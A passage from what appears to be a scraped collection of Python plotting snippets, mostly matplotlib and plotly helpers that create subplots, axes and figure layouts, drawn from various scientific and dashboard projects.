ax1.get_legend().remove() # Remove individual legend for each subplot\n ax2.get_legend().remove() # Remove individual legend for each subplot\n # ax1.label_outer()\n # ax2.label_outer()\n\n # Define appearance\n func_matlab_style(ax)\n\n if fig_title_lst is not None:\n ax.set_title(fig_title_lst[index], fontweight='bold')\n if sub_titles is not None:\n ax.text(-25, -43, sub_titles[index], fontsize=11, fontweight='bold')\n if anno_text_lst is not None:\n ax.text(axes_cfg_dic_lst[0]['xlim'][0]+10, -5, anno_text_lst[index], fontsize=8)\n # ax.set_aspect('equal')\n\n ax1_handles, ax1_labels = ax1.get_legend_handles_labels()\n ax2_handles, ax2_labels = ax2.get_legend_handles_labels()\n handles = ax1_handles + ax2_handles\n labels = ax1_labels + ax2_labels\n fontsize_legend = axes_cfg_dic_lst[0].get('fontsize_legend', 12)\n fig.legend(handles, labels, ncol=4, loc='lower center', prop={'size': fontsize_legend})\n\n fig.tight_layout(rect=subplot_fit_rect) # otherwise the right y-label is slightly clipped\n plt.show()", "def plot(self, axes):\n if self.is_leaf:\n axes.plot([p.x for p in self.points], [p.y for p in self.points], 'bo')\n else:\n axes.plot([self.centre.x - self.size / 2, self.centre.x + self.size / 2],\n [self.centre.y, self.centre.y], '-', color='gray')\n axes.plot([self.centre.x, self.centre.x],\n [self.centre.y - self.size / 2, self.centre.y + self.size / 2],\n '-', color='gray')\n for child in self.children:\n child.plot(axes)\n axes.set_aspect(1)", "def get_ax(rows=1, cols=1, size=8):\r\n _, ax = plt.subplots(rows, cols, figsize=(size * cols, size * rows))\r\n return ax", "def set_figure_variables(self):\n #self.fig.canvas.manager.full_screen_toggle()\n self.gs = self.fig.add_gridspec(2, 3)\n self.ax1 = self.fig.add_subplot(self.gs[0, 0])\n self.ax2 = self.fig.add_subplot(self.gs[0, 1])\n self.ax3 = self.fig.add_subplot(self.gs[0, 2])\n self.ax4 = self.fig.add_subplot(self.gs[1, 0])\n self.ax5 = self.fig.add_subplot(self.gs[1, 1])\n self.ax6 = self.fig.add_subplot(self.gs[1, 2])\n # histogram with indicator scoring\n self.ax1.set_xlabel(\"indicators\")\n self.ax1.set_ylabel(\"score (%)\")\n # graph with flood safety levels\n self.ax2.set_xlabel(\"dike section\")\n self.ax2.set_ylabel(\"chance of flooding occurrence\")\n # graph with water levels vs dike height\n self.ax3.set_xlabel(\"river length (meters)\")\n self.ax3.set_ylabel(\"height (meters)\")\n # graph with overall costs made\n self.ax6.set_ylabel(\"million Euros\")\n \n self.ax1.set_ylim([0, 100])\n self.ax2.set_ylim([0, 100])\n self.ax3.set_ylim([14, 18])\n self.ax6.set_ylim([0, 25000000])\n \n self.ax1.set_title(\"Overall score on indicators\")\n self.ax2.set_title(\"Flood safety levels\")\n self.ax3.set_title(\"Normative water levels vs dike crest height\")\n self.ax6.set_title(\"Budget spent\")\n \n self.x_pos = np.arange(len(self.indicators))\n self.ax1.set_xticks(self.x_pos)\n self.ax1.set_xticklabels(self.indicators)\n \n flood_safety_levels = [100, 200, 400, 600, 800, 1000, 1250]\n self.ax2.set_yticks(flood_safety_levels)\n self.ax2.set_yticklabels([\"1/\"+str(value) for value in flood_safety_levels])\n \n self.plot1 = None\n self.plot2 = None\n self.plot3 = None\n self.plot4 = None\n self.plot5 = None\n self.plot6 = None\n return", "def plot(self):\n attr = self.Graph[\"root\"]\n if (self.type == 0 or self.type == 1):\n self.subplot_1(attr, 0)\n else:\n self.subplot_2(attr, 0)", "def create_four_subplots():\n pass", "def create_figure_with_subfigure(exercise_value):\n fig = make_subplots(\n rows=math.ceil(len(exercise_value) / 2),\n cols=2,\n subplot_titles=exercise_value,\n shared_xaxes=True,\n shared_yaxes=True,\n )\n return fig", "def subplot_for_map(show_x_axis=False, show_y_axis=False, aspect='equal', **kwargs):\n fig, ax = plt.subplots(**kwargs)\n ax.set_aspect(aspect)\n\n ax.get_xaxis().set_visible(show_x_axis)\n ax.get_yaxis().set_visible(show_y_axis)\n\n if show_x_axis:\n fig.autofmt_xdate()\n\n return fig, ax", "def build_scatter_subplot(fig, x, y, row_num, text, xaxis_text, yaxis_text):\n\n # Place provided data\n fig.add_trace(go.Scatter(x=x, y=y, mode=\"markers\", marker=dict(size=10)), row=row_num, col=1)\n # Approximate linear function\n res = sm.OLS(y, sm.add_constant(x)).fit().fittedvalues\n # Place trendline\n fig.add_trace(go.Scatter(x=x, y=res, mode=\"lines\"), row=row_num, col=1)\n # Place subplot (for the first subplot, we need to refer to the title of the figure itself) title\n if row_num == 1:\n fig.update_layout(title={\"text\": text})\n else:\n fig.layout.annotations[row_num - 2].update(text=text)\n # Place axis text\n fig.update_xaxes(title_text=xaxis_text, row=row_num, col=1)\n fig.update_yaxes(title_text=yaxis_text, row=row_num, col=1)", "def subplottPNG(self):\n os.chdir(self.mainDir)\n folder = os.listdir(u'.')\n folders = [f for f in folder if f[0] == 'S']\n\n for subject in folders:\n\n try: # go to the 'results' directory\n resultsDir = os.path.join(os.path.join(self.mainDir, subject),'results')\n os.chdir(resultsDir)\n\n # find all files with .png extension\n pngfiles = glob.glob('*.png')\n pngfiles.sort(key = lambda x:x[0])\n pngfiles.sort(key = lambda x:x[1])\n\n fig = plt.figure()\n\n for ii, filename in enumerate(pngfiles):\n f = plt.subplot(4,4,ii+1)\n f.set_axis_off()\n f.set_xlabel('ses:'+str(ii+1))# f.set_figheight(15)\n fig.set_figwidth(30)\n fig.set_figheight(30)\n fig.tight_layout()\n img = matplotlib.image.imread(filename)\n plt.imshow(img)\n\n figname = subject + '_subplot'+ '.png'\n matplotlib.pyplot.savefig(figname)\n\n except Exception as errMessage:\n print(errMessage)", "def new_axes(self, ax):\n self.ax = ax\n if self.canvas is not ax.figure.canvas:\n if self.canvas is not None:\n self.disconnect_events()\n\n self.canvas = ax.figure.canvas\n self.connect_default_events()\n\n # Reset\n self._selection_completed = False\n\n if self.direction == 'horizontal':\n trans = ax.get_xaxis_transform()\n w, h = 0, 1\n else:\n trans = ax.get_yaxis_transform()\n w, h = 1, 0\n rect_artist = Rectangle((0, 0), w, h,\n transform=trans,\n visible=False,\n **self._props)\n\n self.ax.add_patch(rect_artist)\n self._selection_artist = rect_artist", "def subplot_fit(self):\r\n\r\n self.open_subplot_figure(number_subplots=12)\r\n\r\n self.figures_2d(data=True)\r\n\r\n self.set_title(label=\"Data (Source Scale)\")\r\n self.figures_2d(data=True, use_source_vmax=True)\r\n self.set_title(label=None)\r\n\r\n self.figures_2d(signal_to_noise_map=True)\r\n self.figures_2d(model_image=True)\r\n\r\n self.set_title(label=\"Lens Light Model Image\")\r\n self.figures_2d_of_planes(plane_index=0, model_image=True)\r\n\r\n # If the lens light is not included the subplot index does not increase, so we must manually set it to 4\r\n self.mat_plot_2d.subplot_index = 6\r\n\r\n final_plane_index = len(self.fit.tracer.planes) - 1\r\n\r\n self.mat_plot_2d.cmap.kwargs[\"vmin\"] = 0.0\r\n\r\n self.set_title(label=\"Lens Light Subtracted Image\")\r\n self.figures_2d_of_planes(plane_index=final_plane_index, subtracted_image=True, use_source_vmax=True)\r\n\r\n self.set_title(label=\"Source Model Image (Image Plane)\")\r\n self.figures_2d_of_planes(plane_index=final_plane_index, model_image=True, use_source_vmax=True)\r\n\r\n self.mat_plot_2d.cmap.kwargs.pop(\"vmin\")\r\n\r\n self.set_title(label=\"Source Plane (Zoomed)\")\r\n self.figures_2d_of_planes(plane_index=final_plane_index, plane_image=True, use_source_vmax=True)\r\n\r\n\r\n self.set_title(label=None)\r\n\r\n self.mat_plot_2d.subplot_index = 9\r\n\r\n self.figures_2d(normalized_residual_map=True)\r\n\r\n self.mat_plot_2d.cmap.kwargs[\"vmin\"] = -1.0\r\n self.mat_plot_2d.cmap.kwargs[\"vmax\"] = 1.0\r\n\r\n self.set_title(label=\"Normalized Residual Map (1 sigma)\")\r\n self.figures_2d(normalized_residual_map=True)\r\n self.set_title(label=None)\r\n\r\n self.mat_plot_2d.cmap.kwargs.pop(\"vmin\")\r\n self.mat_plot_2d.cmap.kwargs.pop(\"vmax\")\r\n\r\n self.figures_2d(chi_squared_map=True)\r\n\r\n self.set_title(label=\"Source Plane (No Zoom)\")\r\n self.figures_2d_of_planes(\r\n plane_index=final_plane_index,\r\n plane_image=True,\r\n zoom_to_brightest=False,\r\n use_source_vmax=True\r\n )\r\n\r\n self.set_title(label=None)\r\n\r\n self.mat_plot_2d.output.subplot_to_figure(\r\n auto_filename=\"subplot_fit\"\r\n )\r\n self.close_subplot_figure()", "def plot_overlay2axes(self, axes) -> None:\n # calculate height (based on leaf analysis ratio)\n upper_point = (\n self.leaf_center_px - self.leaf_width_px / 2 * self._analysis_ratio\n )\n lower_point = (\n self.leaf_center_px + self.leaf_width_px / 2 * self._analysis_ratio\n )\n height = abs(upper_point - lower_point) * 0.8\n\n for idx, line in enumerate(self.marker_lines):\n width = abs(self.error[idx]) * self._image.dpmm\n y = line.center.y\n x = self.position[idx] - (self.error[idx] * self._image.dpmm) / 2\n\n if self._orientation == Orientation.UP_DOWN:\n r = Rectangle(width, height, center=(x, y))\n # if any of the values are over tolerance, show another larger rectangle to draw the eye\n if not self.passed[idx] or not self.passed_action[idx]:\n re = Rectangle(\n self._image_window.shape[1] * 0.2, height * 1.2, center=(x, y)\n )\n re.plot2axes(\n axes,\n edgecolor=\"none\",\n fill=True,\n alpha=0.5,\n facecolor=self.bg_color[idx],\n )\n else:\n r = Rectangle(height, width, center=(x, y))\n if not self.passed[idx] or not self.passed_action[idx]:\n re = Rectangle(\n self._image_window.shape[1] * 0.2, height * 1.2, center=(x, y)\n )\n re.plot2axes(\n axes,\n edgecolor=\"none\",\n fill=True,\n alpha=0.5,\n facecolor=self.bg_color[idx],\n )\n r.plot2axes(\n axes, edgecolor=\"none\", fill=True, alpha=1, facecolor=self.bg_color[idx]\n )", "def setup_figure_1ax(x_label='', y_label='', size=(13, 9), shrink_ax=True):\n\n matplotlib.rcParams.update({'font.size': 20})\n fig, ax = plt.subplots()\n fig.set_size_inches(size)\n ax.set_xlabel(x_label)\n ax.set_ylabel(y_label)\n ax.spines['top'].set_visible(False)\n ax.spines['right'].set_visible(False)\n ax.spines['bottom'].set_visible(False)\n ax.spines['left'].set_visible(False)\n # Shrink current axis by 20%\n if shrink_ax:\n box = ax.get_position()\n ax.set_position([box.x0, box.y0, box.width * 0.8, box.height])\n ax.grid()\n return fig, ax", "def plot_evolution(self, layer, sublayer, figures=[], axes=[]):\n if figures==[]:\n figures.append(plt.figure(\"Basis evolution per recording (euclidean distance between sets of basis)\"))\n distance_legend = [\"Base N: \"+str(i) for i in range(len(self.basis[layer][sublayer]))]\n axes.append(figures[0].add_subplot('111'))\n axes[0].plot(self.basis_distance[layer][sublayer])\n axes[0].legend(tuple(distance_legend))\n axes[0].set_xlabel(\"Recording Number\")\n \n evolution_parameters=np.array([self.noise_history[layer][sublayer], \n self.learning_history[layer][sublayer],\n self.sparsity_history[layer][sublayer],\n self.sensitivity_history[layer][sublayer]]).transpose()\n evolution_legend = (\"Noise\",\"Learning step\",\"Sparsity\",\"Sensitivity\")\n figures.append(plt.figure(\"Network parameter evolution per recording\"))\n axes.append(figures[1].add_subplot('111'))\n axes[1].plot(evolution_parameters)\n axes[1].legend(tuple(evolution_legend))\n axes[1].set_xlabel(\"Recording Number\")\n else:\n \n axes[0].clear()\n distance_legend = [\"Base N: \"+str(i) for i in range(len(self.basis[layer][sublayer]))] \n axes[0].plot(self.basis_distance[layer][sublayer])\n axes[0].legend(tuple(distance_legend))\n axes[0].set_xlabel(\"Recording Number\")\n \n axes[1].clear()\n evolution_parameters=np.array([self.noise_history[layer][sublayer], \n self.learning_history[layer][sublayer],\n self.sparsity_history[layer][sublayer],\n self.sensitivity_history[layer][sublayer]]).transpose()\n evolution_legend = (\"Noise\",\"Learning step\",\"Sparsity\",\"Sensitivity\")\n axes[1].plot(evolution_parameters)\n axes[1].legend(tuple(evolution_legend))\n axes[1].set_xlabel(\"Recording Number\")\n return figures, axes", "def get_ax(rows=1, cols=1, size=8):\n fig , ax = plt.subplots(rows, cols, figsize=(size*cols, size*rows))\n return fig,ax", "def get_ax(rows=1, cols=1, size=8):\n _, ax = plt.subplots(rows, cols, figsize=(size * cols, size * rows))\n return ax", "def addFigure(self,fig,xl,yl,scale):\n img = py.image.load(fig)\n w,h = img.get_size()\n img = py.transform.scale(img,(int(w*scale),int(h*scale)))\n self.figures.append(img)\n self.locs.append((xl,yl))", "def draw_canvas(plt, nrows = 2, ncols = 1, gridspec_kw = None, sharex = True, multiscales = False):\n if not gridspec_kw: # Use default [1,1,1,1]\n ratios = ncols*nrows*[1]\n gridspec_kw = {\n 'height_ratios' : ratios,\n 'hspace' : 0,\n 'left' : 0.0,\n 'right' : 2.0,\n 'bottom' : 0.0,\n 'top' : 1.0 }\n fig, axis = plt.subplots(nrows, ncols, sharex = sharex, gridspec_kw = gridspec_kw)\n if isinstance(axis, np.ndarray): \n axis = [ec.extend_all(i) for i in axis]\n else:\n axis = [ec.extend_all(axis)]\n if multiscales:\n tmp = []\n for axe in axis:\n tmp_axe = axe.twinx()\n tmp.append(ec.extend_all(tmp_axe))\n axis += tmp\n\n return fig, axis", "def get_ax(rows=1, cols=1, size=8):\n _, ax = plt.subplots(rows, cols, figsize=(size*cols, size*rows))\n return ax", "def get_ax(rows=1, cols=1, size=8):\n _, ax = plt.subplots(rows, cols, figsize=(size*cols, size*rows))\n return ax", "def draw(subplots, title=''):\n if type(subplots) == SubPlot:\n subplots = [[subplots]]\n font_size = 16\n title_size = 20\n root = tk.Tk()\n root.title(title if title else 'Plot')\n root.geometry(\"1050x700\")\n fig = create_figure(root)\n\n num_rows = len(subplots)\n num_columns = max(len(graphs) for graphs in subplots)\n\n for i in range(num_rows):\n for j in range(num_columns):\n subplot = subplots[i][j]\n if subplot is None:\n continue\n index = (i*num_columns)+j+1\n ax = fig.add_subplot(num_rows, num_columns, index)\n ax.set_ylabel(subplot.y_label, fontsize=font_size)\n ax.set_xlabel(subplot.x_label, fontsize=font_size)\n ax.set_title(subplot.title, fontsize=font_size, fontweight='bold')\n ax.ticklabel_format(axis='y', style='sci')\n ax.ticklabel_format(useOffset=False)\n for graph in subplot.graphs:\n if type(graph) == Histogram:\n _draw_historgram(ax, graph)\n elif type(graph) == Graph:\n _draw_graph(ax, graph)\n '''\n spacing = 2\n if subplot.x_log:\n ax.set_xscale('log')\n x_lim = ax.get_xlim()\n ax.set_xlim(x_lim[0]/spacing, x_lim[1]*spacing)\n ax.grid(which='both')\n if subplot.y_log:\n ax.set_yscale('log')\n y_lim = ax.get_ylim()\n ax.set_ylim(y_lim[0]/spacing, y_lim[1]*spacing*3)\n ax.grid(which='both')\n '''\n with warnings.catch_warnings():\n warnings.simplefilter('ignore')\n ax.legend(loc='best')\n\n fig.suptitle(title, fontweight='bold', fontsize=title_size)\n fig.subplots_adjust(hspace=.6, wspace=.3)\n root.mainloop()", "def show_axes(self):\n if hasattr(self, 'axes_widget'):\n self.axes_widget.EnabledOn()\n self.axes_widget.SetCurrentRenderer(self)\n else:\n self.add_axes()\n self.Modified()", "def one_data_figure_sep(obs, fig, subplot_spec=None, **kwargs):\n if subplot_spec is None:\n gs = gridspec.GridSpec(2,1,height_ratios = [3,1], hspace=0)\n else:\n gs = gridspec.GridSpecFromSubplotSpec(2, 1, hspace=0,\n subplot_spec=subplot_spec,\n height_ratios = [3,1])\n \n \n spec = pl.Subplot(fig, gs[0,0])\n spec.plot(obs['wavelength'], obs['spectrum'], **kwargs)\n spec.set_ylabel(r'$f_\\lambda \\times \\, C$')\n pl.setp(spec.get_xticklabels(), visible = False)\n fig.add_subplot(spec)\n unc = pl.Subplot(fig, gs[1,0])\n unc.plot(obs['wavelength'], obs['unc'], **kwargs)\n unc.set_ylabel(r'$\\sigma f_\\lambda$')\n unc.set_xlabel(r'$\\lambda (\\AA)$')\n fig.add_subplot(unc)\n return fig, gs", "def _update_axes(self):\n data_shape = self.data.shape\n if len(self.axes) < self.data.ndim + 1:\n self._axes.append(Axis())\n for index in range(self.data.ndim):\n if len(self.axes[index].values) != data_shape[index]:\n self.axes[index].values = np.arange(data_shape[index],\n dtype=np.float64)", "def get_ax(rows=1, cols=1, size=16):\n _, ax = plt.subplots(rows, cols, figsize=(size * cols, size * rows))\n return ax", "def get_ax(rows=1, cols=1, size=16):\n _, ax = plt.subplots(rows, cols, figsize=(size * cols, size * rows))\n return ax", "def _add_cluster_subplot(grid, position, y_label, colspan=1):\n config = load_config(None, join(get_common(), 'config.cfg'))\n plot_width = config.getint('common', 'plot_width')\n subplot = plt.subplot2grid(grid, position, colspan=colspan)\n subplot.set_ylabel(y_label)\n subplot.set_xlabel('number of clusters')\n subplot.set_xlim([-3, plot_width + 3])\n subplot.set_ylim([-0.05, 1.05])\n return subplot", "def get_ax(rows=1, cols=1, size=16):\n size = 5\n _, ax = plt.subplots(rows, cols, figsize=(size*cols, size*rows))\n return ax", "def get_ax(rows=1, cols=1, size=16):\n _, ax = plt.subplots(rows, cols, figsize=(size*cols, size*rows))\n return ax", "def get_ax(rows=1, cols=1, size=16):\n _, ax = plt.subplots(rows, cols, figsize=(size*cols, size*rows))\n return ax", "def __draw(self):\n plt.rcParams.update(self.settings.rcParams)\n\n self.fig = plt.figure()\n self.ax = self.fig.add_axes(self.axes_rect)\n\n xs = np.arange(1, self.xmax+1)\n ys = [np.arange(0, self.ymax) for i in range(self.xmax)]\n\n self.ax.plot(xs, ys)\n\n self.__draw_xaxis()\n self.__draw_yaxis()\n\n self.__draw_annotations()\n self.__draw_eras()\n self.__draw_era_spans()\n self.__draw_watermark()\n self.__draw_title()\n self.__draw_image()\n self.__draw_max_age()\n\n self.ax.set_aspect('equal', share=True)", "def _share_setup(self):\n # Panel axes sharing, between main subplot and its panels\n def shared(paxs):\n return [\n pax for pax in paxs\n if not pax._panel_filled and pax._panel_share\n ]\n\n if not self._panel_side: # this is a main axes\n # Top and bottom\n bottom = self\n paxs = shared(self._bpanels)\n if paxs:\n bottom = paxs[-1]\n for iax in (self, *paxs[:-1]):\n # parent is *bottom-most* panel\n iax._sharex_setup(bottom, 3)\n paxs = shared(self._tpanels)\n for iax in paxs:\n iax._sharex_setup(bottom, 3)\n # Left and right\n left = self\n paxs = shared(self._lpanels)\n if paxs:\n left = paxs[0]\n for iax in (*paxs[1:], self):\n iax._sharey_setup(left, 3) # parent is *bottom-most* panel\n paxs = shared(self._rpanels)\n for iax in paxs:\n iax._sharey_setup(left, 3)\n\n # Main axes, sometimes overrides panel axes sharing\n # TODO: This can get very repetitive, but probably minimal impact?\n # Share x axes\n parent, *children = self._get_extent_axes('x')\n for child in children:\n child._sharex_setup(parent)\n # Share y axes\n parent, *children = self._get_extent_axes('y')\n for child in children:\n child._sharey_setup(parent)", "def assemblePlot(self):\n self.clearPlot()\n self.axes = self.figure.add_subplot(111)\n\n # Reset handles\n self._fluxOverlayHandles = []\n self._magneticAxisHandle = None\n self._orbitHandles = []\n self._separatrixOverlayHandle = None\n self._wallCrossSectionOverlayHandle = None\n\n # Plot image\n self.plotEq()\n\n # Plot overlays\n self.plotOverlays()\n\n self.adjustAxes()", "def get_ax(rows=1, cols=1, size=32):\n _, ax = plt.subplots(rows, cols, figsize=(size * cols, size * rows))\n return ax", "def show_figure_grid(fig: object, figx: int=10, figy: int=10) -> object:\n \n backGrid = fig.figure_handle.add_axes([0, 0, 1, 1], frameon=False)\n backGrid.set_ylim(0.0, figy)\n backGrid.set_xlim(0.0, figx)\n backGrid.grid(True)\n\n backGrid.set_yticks(np.arange(0.0, figy + 0.01, 1.0))\n backGrid.set_yticks(np.arange(0.0, figy + 0.01, 0.1), minor=True)\n backGrid.set_xticks(np.arange(0.0, figx + 0.01, 1.0))\n backGrid.set_xticks(np.arange(0.0, figx + 0.01, 0.1), minor=True)\n # backGrid.get_xaxis().set_minor_locator(matplotlib.ticker.AutoMinorLocator())\n # backGrid.get_yaxis().set_minor_locator(matplotlib.ticker.AutoMinorLocator())\n backGrid.grid(visible=True, which=\"major\", color=\"g\", alpha=0.5, linewidth=0.8)\n backGrid.grid(visible=True, which=\"minor\", color=\"g\", alpha=0.3, linewidth=0.2)\n return backGrid", "def figures(self):\n if np.size(self.iceicehorizons_depth1)>0:\n fig, ax = mpl.subplots()\n if self.site1.archive == 'icecore':\n mpl.xlabel(self.site1.label+' ice age (yr b1950)')\n else:\n mpl.xlabel(self.site1.label+' age (yr b1950)')\n if self.site2.archive == 'icecore':\n mpl.ylabel(self.site2.label+' ice age (yr b1950)')\n else:\n mpl.ylabel(self.site2.label+' age (yr b1950)')\n if np.size(self.iceicehorizons_depth1) > 0:\n if pccfg.show_initial:\n mpl.plot(self.site1.fct_age_init(self.iceicehorizons_depth1),\n self.site2.fct_age_init(self.iceicehorizons_depth2),\n color=pccfg.color_init, linestyle='', marker='o', markersize=2,\n label=\"Initial\")\n mpl.plot(self.site1.fct_age_model(self.iceicehorizons_depth1),\n self.site2.fct_age_model(self.iceicehorizons_depth2),\n color=pccfg.color_mod, linestyle='', marker='o', markersize=2,\n label=\"Prior\")\n mpl.errorbar(self.site1.fct_age(self.iceicehorizons_depth1),\n self.site2.fct_age(self.iceicehorizons_depth2), color=pccfg.color_opt,\n xerr=np.zeros(np.size(self.iceicehorizons_depth1)),\n linestyle='', marker='o', markersize=2,\n label=\"Posterior\")\n xstart = self.site1.fct_age(self.iceicehorizons_depth1)-self.iceicehorizons_sigma/2\n ystart = self.site2.fct_age(self.iceicehorizons_depth2)+self.iceicehorizons_sigma/2\n for i in range(np.size(self.iceicehorizons_depth1)):\n mpl.arrow(xstart[i], ystart[i], self.iceicehorizons_sigma[i],\n -self.iceicehorizons_sigma[i], color=pccfg.color_opt,\n width=0.0, head_length=0.0, head_width=0.0)\n x_low, x_up, y_low, y_up = mpl.axis()\n# x_low = self.site1.age_top\n# y_low = self.site2.age_top\n# mpl.axis((x_low, x_up, y_low, y_up))\n rangefig = np.array([min(x_low, y_low), max(x_up, y_up)])\n mpl.plot(rangefig, rangefig, color=pccfg.color_obs, label='perfect agreement', zorder=0)\n mpl.legend(loc=\"best\")\n ax.set_aspect('equal')\n if self.site1.archive == 'icecore' and self.site2.archive == 'icecore':\n printed_page = PdfPages(pccfg.datadir+self.label+'/ice_ice_synchro.pdf')\n elif self.site1.archive == 'icecore' or self.site2.archive == 'icecore':\n printed_page = PdfPages(pccfg.datadir+self.label+'/ice_synchro.pdf')\n else:\n printed_page = PdfPages(pccfg.datadir+self.label+'/synchro.pdf')\n printed_page.savefig(fig)\n printed_page.close()\n if not pccfg.show_figures:\n mpl.close()\n\n if self.site1.archive == 'icecore' and self.site2.archive == 'icecore':\n if np.size(self.airairhorizons_depth1)>0:\n fig, ax = mpl.subplots()\n mpl.xlabel(self.site1.label+' air age (yr b1950)')\n mpl.ylabel(self.site2.label+' air age (yr b1950)')\n if np.size(self.airairhorizons_depth1) > 0:\n if pccfg.show_initial:\n mpl.plot(self.site1.fct_airage_init(self.airairhorizons_depth1),\n self.site2.fct_airage_init(self.airairhorizons_depth2),\n color=pccfg.color_init,\n linestyle='',\n marker='o', markersize=2, label=\"Initial\")\n mpl.plot(self.site1.fct_airage_model(self.airairhorizons_depth1),\n self.site2.fct_airage_model(self.airairhorizons_depth2),\n color=pccfg.color_mod,\n linestyle='', marker='o', markersize=2,\n label=\"Prior\")\n mpl.errorbar(self.site1.fct_airage(self.airairhorizons_depth1),\n self.site2.fct_airage(self.airairhorizons_depth2),\n color=pccfg.color_opt,\n xerr=np.zeros_like(self.airairhorizons_sigma),\n linestyle='', marker='o', markersize=2,\n label=\"Posterior\")\n xstart = self.site1.fct_airage(self.airairhorizons_depth1)-\\\n self.airairhorizons_sigma/2\n ystart = self.site2.fct_airage(self.airairhorizons_depth2)+\\\n self.airairhorizons_sigma/2\n for i in range(np.size(self.airairhorizons_depth1)):\n mpl.arrow(xstart[i], ystart[i], self.airairhorizons_sigma[i],\n -self.airairhorizons_sigma[i], color=pccfg.color_opt,\n width=0.0, head_length=0.0, head_width=0.0)\n x_low, x_up, y_low, y_up = mpl.axis()\n# x_low = self.site1.age_top\n# y_low = self.site2.age_top\n# mpl.axis((x_low, x_up, y_low, y_up))\n rangefig = np.array([min(x_low, y_low), max(x_up, y_up)])\n mpl.plot(rangefig, rangefig, color=pccfg.color_obs, label='perfect agreement',\n zorder=0)\n mpl.legend(loc=\"best\")\n ax.set_aspect('equal')\n printed_page = PdfPages(pccfg.datadir+self.label+'/air_air_synchro.pdf')\n printed_page.savefig(fig)\n printed_page.close()\n if not pccfg.show_figures:\n mpl.close()\n\n if self.site2.archive == 'icecore':\n if np.size(self.iceairhorizons_depth1)>0:\n fig, ax = mpl.subplots()\n if self.site1.archive == 'icecore':\n mpl.xlabel(self.site1.label+' ice age (yr b1950)')\n else:\n mpl.xlabel(self.site1.label+' age (yr b1950)')\n mpl.ylabel(self.site2.label+' air age (yr b1950)')\n if np.size(self.iceairhorizons_depth1) > 0:\n if pccfg.show_initial:\n mpl.plot(self.site1.fct_age_init(self.iceairhorizons_depth1),\n self.site2.fct_airage_init(self.iceairhorizons_depth2),\n color=pccfg.color_init,\n linestyle='',\n marker='o', markersize=2, label=\"Initial\")\n mpl.plot(self.site1.fct_age_model(self.iceairhorizons_depth1),\n self.site2.fct_airage_model(self.iceairhorizons_depth2),\n color=pccfg.color_mod,\n linestyle='', marker='o', markersize=2,\n label=\"Prior\")\n mpl.errorbar(self.site1.fct_age(self.iceairhorizons_depth1),\n self.site2.fct_airage(self.iceairhorizons_depth2),\n color=pccfg.color_opt,\n xerr=np.zeros_like(self.iceairhorizons_sigma),\n linestyle='', marker='o', markersize=2,\n label=\"Posterior\")\n xstart = self.site1.fct_age(self.iceairhorizons_depth1)-\\\n self.iceairhorizons_sigma/2\n ystart = self.site2.fct_airage(self.iceairhorizons_depth2)+\\\n self.iceairhorizons_sigma/2\n for i in range(np.size(self.iceairhorizons_depth1)):\n mpl.arrow(xstart[i], ystart[i], self.iceairhorizons_sigma[i],\n -self.iceairhorizons_sigma[i], color=pccfg.color_opt,\n width=0.0, head_length=0.0, head_width=0.0) \n x_low, x_up, y_low, y_up = mpl.axis()\n# x_low = self.site1.age_top\n# y_low = self.site2.age_top\n# mpl.axis((x_low, x_up, y_low, y_up))\n rangefig = np.array([min(x_low, y_low), max(x_up, y_up)])\n mpl.plot(rangefig, rangefig, color=pccfg.color_obs, label='perfect agreement',\n zorder=0)\n mpl.legend(loc=\"best\")\n ax.set_aspect('equal')\n if self.site1.archive == 'icecore':\n printed_page = PdfPages(pccfg.datadir+self.label+'/ice_air_synchro.pdf')\n else:\n printed_page = PdfPages(pccfg.datadir+self.label+'/air_synchro.pdf')\n printed_page.savefig(fig)\n printed_page.close()\n if not pccfg.show_figures:\n mpl.close()\n\n if self.site1.archive == 'icecore':\n if np.size(self.airicehorizons_depth1)>0:\n fig, ax = mpl.subplots()\n mpl.xlabel(self.site1.label+' air age (yr b1950)')\n if self.site2.archive == 'icecore':\n mpl.ylabel(self.site2.label+' ice age (yr b1950)')\n else:\n mpl.ylabel(self.site2.label+' age (yr b1950)')\n if np.size(self.airicehorizons_depth1) > 0:\n if pccfg.show_initial:\n mpl.plot(self.site1.fct_airage_init(self.airicehorizons_depth1),\n self.site2.fct_age_init(self.airicehorizons_depth2),\n color=pccfg.color_init,\n linestyle='', marker='o', markersize=2, label=\"Initial\")\n mpl.plot(self.site1.fct_airage_model(self.airicehorizons_depth1),\n self.site2.fct_age_model(self.airicehorizons_depth2),\n color=pccfg.color_mod,\n linestyle='', marker='o', markersize=2,\n label=\"Prior\")\n mpl.errorbar(self.site1.fct_airage(self.airicehorizons_depth1),\n self.site2.fct_age(self.airicehorizons_depth2),\n color=pccfg.color_opt,\n xerr=np.zeros_like(self.airicehorizons_sigma),\n linestyle='', marker='o', markersize=2,\n label=\"Posterior\")\n xstart = self.site1.fct_airage(self.airicehorizons_depth1)-\\\n self.airicehorizons_sigma/2\n ystart = self.site2.fct_age(self.airicehorizons_depth2)+\\\n self.airicehorizons_sigma/2\n for i in range(np.size(self.airicehorizons_depth1)):\n mpl.arrow(xstart[i], ystart[i], self.airicehorizons_sigma[i],\n -self.airicehorizons_sigma[i], color=pccfg.color_opt,\n width=0.0, head_length=0.0, head_width=0.0)\n x_low, x_up, y_low, y_up = mpl.axis()\n# x_low = self.site1.age_top\n# y_low = self.site2.age_top\n# mpl.axis((x_low, x_up, y_low, y_up))\n rangefig = np.array([min(x_low, y_low), max(x_up, y_up)])\n mpl.plot(rangefig, rangefig, color=pccfg.color_obs, label='perfect agreement')\n mpl.legend(loc=\"best\")\n ax.set_aspect('equal')\n if self.site2.archive == 'icecore':\n printed_page = PdfPages(pccfg.datadir+self.label+'/air_ice_synchro.pdf')\n else:\n printed_page = PdfPages(pccfg.datadir+self.label+'/air_synchro.pdf')\n printed_page.savefig(fig)\n printed_page.close()\n if not pccfg.show_figures:\n mpl.close()", "def create_fig_ax(ax, **kwargs):\n if ax is None:\n fig, ax = plt.subplots(**kwargs)\n else:\n fig = ax.get_figure()\n return fig, ax", "def make_frame(nbinx, nbiny, title='',d_beg='',d_end='',ylow='',yup='',maxticks='',dates = False):\n\n aax = (1,) * nbinx\n ax = (aax,) * nbiny\n\n f, (ax) = plt.subplots(nbinx,nbiny, sharex=True, sharey=True)\n f.suptitle(title)\n \n f.subplots_adjust(hspace=0.05)\n f.subplots_adjust(wspace=0.05)\n f.subplots_adjust(top=0.95)\n f.subplots_adjust(right=0.95)\n f.subplots_adjust(left=0.05) \n if dates:\n f.autofmt_xdate(bottom=0.1, rotation=90, ha='right') \n\n # --- customize x and y range and number of ticks\n\n if nbinx==1 and nbiny==1:\n ax = [[ax]] # cast ax into an array to make the 